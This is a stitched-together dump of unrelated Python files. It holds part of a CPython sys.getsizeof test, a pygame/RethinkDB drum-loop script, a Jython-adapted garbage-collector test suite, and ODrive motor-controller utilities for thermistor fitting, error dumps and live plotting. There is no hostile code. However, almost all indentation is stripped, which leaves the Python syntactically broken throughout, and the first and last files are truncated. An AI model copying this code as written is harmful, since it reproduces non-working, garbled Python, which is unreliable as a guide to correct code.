# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
main.py | import pygame
import time
import threading
import rethinkdb as r
# 1 ... 6
TIME = 0.2
LENGTH_OF_MUSIC_LINE = 10
content = [[] for i in range(LENGTH_OF_MUSIC_LINE)]
#music = {"content": [[0], [0, 1], [0], [0, 1], [0], [0, 1], [1], [0, 2]]}
music = {"content": content}
pygame.mixer.pre_init(44100, -16, 2, 2048)
pygame.init()
sounds = {}
def playingLoop(music):
# Cheap but working
r.connect("localhost", 28015).repl()
currentState = 0
while True:
count = 0
print '---'
for state in music['content']:
print count, state
for i in state:
sounds[i].play()
time.sleep(0.3)
# Here, add the current cursor control
r.db("echoes").table("music").update({"current": currentState}).run()
currentState += 1
if currentState > 9:
currentState = 0
print currentState
count += 1
def dbDump(music):
r.connect("localhost", 28015).repl()
cursor = r.db("echoes").table("music").changes().run()
for document in cursor:
music['content'] = document['new_val']['content']
print document['new_val']
#pygame.mixer.music.load()
for i in range(13):
try:
filename = 'sound' + str(i+1) + '.ogg'
print 'Loading ' + filename + " ..."
sounds[i] = pygame.mixer.Sound(filename)
#sounds[3] = pygame.mixer.Sound("hihat2.wav")
except Exception as e:
print e
continue
modifierDB = threading.Thread(target=dbDump, args=(music,))
loopT = threading.Thread(target=playingLoop, args=(music,))
loopT.start()
modifierDB.start()
|
test_gc.py | import unittest
from test.support import verbose, run_unittest
from test import support
import sys
import gc
import weakref
import time
try:
import threading
except ImportError:
threading = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
### Tests
###############################################################################
class GCTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.setMonitorGlobal(True)
#since gc module already exists, it would not be caught by monitorGlobal.
#so we have to monitor it manually:
gc.monitorObject(gc)
#the finalizer-related tests need this flag to pass in Jython:
gc.addJythonGCFlags(gc.DONT_FINALIZE_CYCLIC_GARBAGE)
except Exception:
pass
@classmethod
def tearDownClass(cls):
#Jython-specific block:
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
gc.stopMonitoring()
except Exception:
pass
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A:
def __del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A(object):
def __del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec(("def f(): pass\n"), d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
col = gc.collect()
self.assertEqual(col, 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
@unittest.skipIf(support.is_jython,
'''
Jython neither supports disabling/enabling the gc, nor
setting the gc threshold.
''')
def test_del(self):
# __del__ methods can trigger collection; make that happen here
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
@unittest.skipIf(support.is_jython,
'''
Jython neither supports disabling/enabling the gc, nor
setting the gc threshold.
''')
def test_del_newclass(self):
# __del__ methods can trigger collection; make that happen here
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example:
# - disposed tuples are not freed, but reused
# - the call to assertEqual somehow avoids building its args tuple
@unittest.skipIf(support.is_jython,
'''
Jython does not support interrogating gc-internal
generation-wise counters.
''')
def test_get_count(self):
# Avoid future allocation of method object
assertEqual = self._baseAssertEqual
gc.collect()
assertEqual(gc.get_count(), (0, 0, 0))
a = dict()
# since gc.collect(), we created two objects:
# the dict, and the tuple returned by get_count()
assertEqual(gc.get_count(), (2, 0, 0))
@unittest.skipIf(support.is_jython,
'''
Jython does not support interrogating gc-internal
generation-wise counters.
''')
def test_collect_generations(self):
# Avoid future allocation of method object
assertEqual = self.assertEqual
gc.collect()
a = dict()
gc.collect(0)
assertEqual(gc.get_count(), (0, 1, 0))
gc.collect(1)
assertEqual(gc.get_count(), (0, 0, 1))
gc.collect(2)
assertEqual(gc.get_count(), (0, 0, 0))
@unittest.skipIf(support.is_jython,
'''
While this test passes in Jython, it leads to internal
allocation failures because of the massive referencing
in this test. To keep the JVM-process healthy and to
avoid subsequent failures due to bad conditions caused
by this test, we skip it for now.
''')
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
try:
gc.disable()
except NotImplementedError:
#i.e. Jython is running (or other non-CPython interpreter without gc-disabling)
pass
@unittest.skipIf(support.is_jython,
'''
Jython does not have a trashcan mechanism.
This test should still not fail but currently does.
This is because the massive referencing in this test brings
sync gc emulation to its limit. Making this more robust is
of no priority for now.
''')
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_checkinterval = sys.getcheckinterval()
sys.setcheckinterval(3)
try:
exit = False
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
for t in threads:
t.start()
time.sleep(0.01)
exit = True
for t in threads:
t.join()
finally:
    sys.setcheckinterval(old_checkinterval)
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = sorted(gc.get_referents(alist))
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray("a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class OldStyle:
pass
class NewStyle(object):
pass
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(OldStyle))
self.assertTrue(gc.is_tracked(OldStyle()))
self.assertTrue(gc.is_tracked(NewStyle))
self.assertTrue(gc.is_tracked(NewStyle()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
@unittest.skipIf(support.is_jython,
'''
GCTogglingTests are neither relevant nor applicable for Jython.
''')
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
try:
gc.disable()
assert not gc.isenabled()
except NotImplementedError:
pass
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
unittest.main()
|
utils.py | from __future__ import print_function
import sys
import time
import threading
import platform
import subprocess
import os
import numpy as np
import matplotlib.pyplot as plt
from fibre.utils import Event
import odrive.enums
from odrive.enums import *
try:
if platform.system() == 'Windows':
import win32console
import colorama
colorama.init()
except ImportError:
print("Could not init terminal features.")
print("Refer to install instructions at http://docs.odriverobotics.com/#downloading-and-installing-tools")
sys.stdout.flush()
pass
if sys.version_info < (3, 0):
input = raw_input
_VT100Colors = {
'green': '\x1b[92;1m',
'cyan': '\x1b[96;1m',
'yellow': '\x1b[93;1m',
'red': '\x1b[91;1m',
'default': '\x1b[0m'
}
def calculate_thermistor_coeffs(degree, Rload, R_25, Beta, Tmin, Tmax, plot = False):
T_25 = 25 + 273.15 #Kelvin
temps = np.linspace(Tmin, Tmax, 1000)
tempsK = temps + 273.15
# https://en.wikipedia.org/wiki/Thermistor#B_or_%CE%B2_parameter_equation
r_inf = R_25 * np.exp(-Beta/T_25)
R_temps = r_inf * np.exp(Beta/tempsK)
V = Rload / (Rload + R_temps)
fit = np.polyfit(V, temps, degree)
p1 = np.poly1d(fit)
fit_temps = p1(V)
if plot:
print(fit)
plt.plot(V, temps, label='actual')
plt.plot(V, fit_temps, label='fit')
plt.xlabel('normalized voltage')
plt.ylabel('Temp [C]')
plt.legend(loc=0)
plt.show()
return p1
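# Hedged usage sketch: the component values below are illustrative, not
# ODrive defaults:
#   p1 = calculate_thermistor_coeffs(3, Rload=3300, R_25=10000, Beta=3434,
#                                    Tmin=-10, Tmax=150, plot=True)
#   temp_c = p1(0.5)  # estimated temperature [C] at a normalized voltage of 0.5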
class OperationAbortedException(Exception):
pass
def set_motor_thermistor_coeffs(axis, Rload, R_25, Beta, Tmin, TMax):
coeffs = calculate_thermistor_coeffs(3, Rload, R_25, Beta, Tmin, TMax)
axis.motor_thermistor.config.poly_coefficient_0 = float(coeffs[3])
axis.motor_thermistor.config.poly_coefficient_1 = float(coeffs[2])
axis.motor_thermistor.config.poly_coefficient_2 = float(coeffs[1])
axis.motor_thermistor.config.poly_coefficient_3 = float(coeffs[0])
def dump_errors(odrv, clear=False):
axes = [(name, axis) for name, axis in odrv._remote_attributes.items() if 'axis' in name]
axes.sort()
for name, axis in axes:
print(name)
# Flatten axis and submodules
# (name, remote_obj, errorcode)
module_decode_map = [
('axis', axis, {k: v for k, v in odrive.enums.__dict__.items() if k.startswith("AXIS_ERROR_")}),
('motor', axis.motor, {k: v for k, v in odrive.enums.__dict__.items() if k.startswith("MOTOR_ERROR_")}),
('fet_thermistor', axis.fet_thermistor, {k: v for k, v in odrive.enums.__dict__.items() if k.startswith("THERMISTOR_CURRENT_LIMITER_ERROR")}),
('motor_thermistor', axis.motor_thermistor, {k: v for k, v in odrive.enums.__dict__.items() if k.startswith("THERMISTOR_CURRENT_LIMITER_ERROR")}),
('encoder', axis.encoder, {k: v for k, v in odrive.enums.__dict__.items() if k.startswith("ENCODER_ERROR_")}),
('controller', axis.controller, {k: v for k, v in odrive.enums.__dict__.items() if k.startswith("CONTROLLER_ERROR_")}),
]
# Module error decode
for name, remote_obj, errorcodes in module_decode_map:
prefix = ' '*2 + name + ": "
if (remote_obj.error != 0):
foundError = False
print(prefix + _VT100Colors['red'] + "Error(s):" + _VT100Colors['default'])
errorcodes_tup = [(name, val) for name, val in errorcodes.items() if 'ERROR_' in name]
for codename, codeval in errorcodes_tup:
if remote_obj.error & codeval != 0:
foundError = True
print(" " + codename)
if not foundError:
print(" " + 'UNKNOWN ERROR!')
if clear:
remote_obj.error = 0
else:
print(prefix + _VT100Colors['green'] + "no error" + _VT100Colors['default'])
def oscilloscope_dump(odrv, num_vals, filename='oscilloscope.csv'):
with open(filename, 'w') as f:
for x in range(num_vals):
f.write(str(odrv.get_oscilloscope_val(x)))
f.write('\n')
data_rate = 100
plot_rate = 10
num_samples = 1000
def start_liveplotter(get_var_callback):
"""
Starts a liveplotter.
The variable that is plotted is retrieved from get_var_callback.
This function returns immediately and the liveplotter quits when
the user closes it.
"""
import matplotlib.pyplot as plt
cancellation_token = Event()
global vals
vals = []
def fetch_data():
global vals
while not cancellation_token.is_set():
try:
data = get_var_callback()
except Exception as ex:
print(str(ex))
time.sleep(1)
continue
vals.append(data)
if len(vals) > num_samples:
vals = vals[-num_samples:]
time.sleep(1/data_rate)
# TODO: use animation for better UI performance, see:
# https://matplotlib.org/examples/animation/simple_anim.html
def plot_data():
global vals
plt.ion()
# Make sure the script terminates when the user closes the plotter
def did_close(evt):
cancellation_token.set()
fig = plt.figure()
fig.canvas.mpl_connect('close_event', did_close)
while not cancellation_token.is_set():
plt.clf()
plt.plot(vals)
plt.legend(list(range(len(vals))))
fig.canvas.draw()
fig.canvas.start_event_loop(1/plot_rate)
fetch_t = threading.Thread(target=fetch_data)
fetch_t.daemon = True
fetch_t.start()
plot_t = threading.Thread(target=plot_data)
plot_t.daemon = True
plot_t.start()
return cancellation_token
#plot_data()
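# Hedged usage sketch (assumes an `odrv0` handle, e.g. from odrive.find_any()):
#   cancel = start_liveplotter(lambda: [odrv0.axis0.encoder.pos_estimate])
#   ...                   # plotter runs in the background
#   cancel.set()          # stop the fetch/plot threads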
class BulkCapture:
'''
Asynchronously captures a bulk set of data when instance is created.
get_var_callback: a function that returns the data you want to collect (see the example below)
data_rate: Sample rate in Hz
duration: Length of time to capture in seconds
Example Usage:
capture = BulkCapture(lambda :[odrv0.axis0.encoder.pos_estimate, odrv0.axis0.controller.pos_setpoint])
# Do stuff while capturing (like sending position commands)
capture.event.wait() # When you're done doing stuff, wait for the capture to be completed.
print(capture.data) # Do stuff with the data
capture.plot_data() # Helper method to plot the data
'''
def __init__(self,
get_var_callback,
data_rate=500.0,
duration=2.0):
from threading import Event, Thread
import numpy as np
self.get_var_callback = get_var_callback
self.event = Event()
def loop():
vals = []
start_time = time.monotonic()
period = 1.0 / data_rate
while time.monotonic() - start_time < duration:
try:
data = get_var_callback()
except Exception as ex:
print(str(ex))
print("Waiting 1 second before next data point")
time.sleep(1)
continue
relative_time = time.monotonic() - start_time
vals.append([relative_time] + data)
time.sleep(period - (relative_time % period)) # this ensures consistently timed samples
self.data = np.array(vals) # A lock is not really necessary due to the event
print("Capture complete")
achieved_data_rate = len(self.data) / self.data[-1, 0]
if achieved_data_rate < (data_rate * 0.9):
print("Achieved average data rate: {}Hz".format(achieved_data_rate))
print("If this rate is significantly lower than what you specified, consider lowering it below the achieved value for more consistent sampling.")
self.event.set() # tell the main thread that the bulk capture is complete
Thread(target=loop, daemon=True).start()
def plot(self):
import matplotlib.pyplot as plt
import inspect
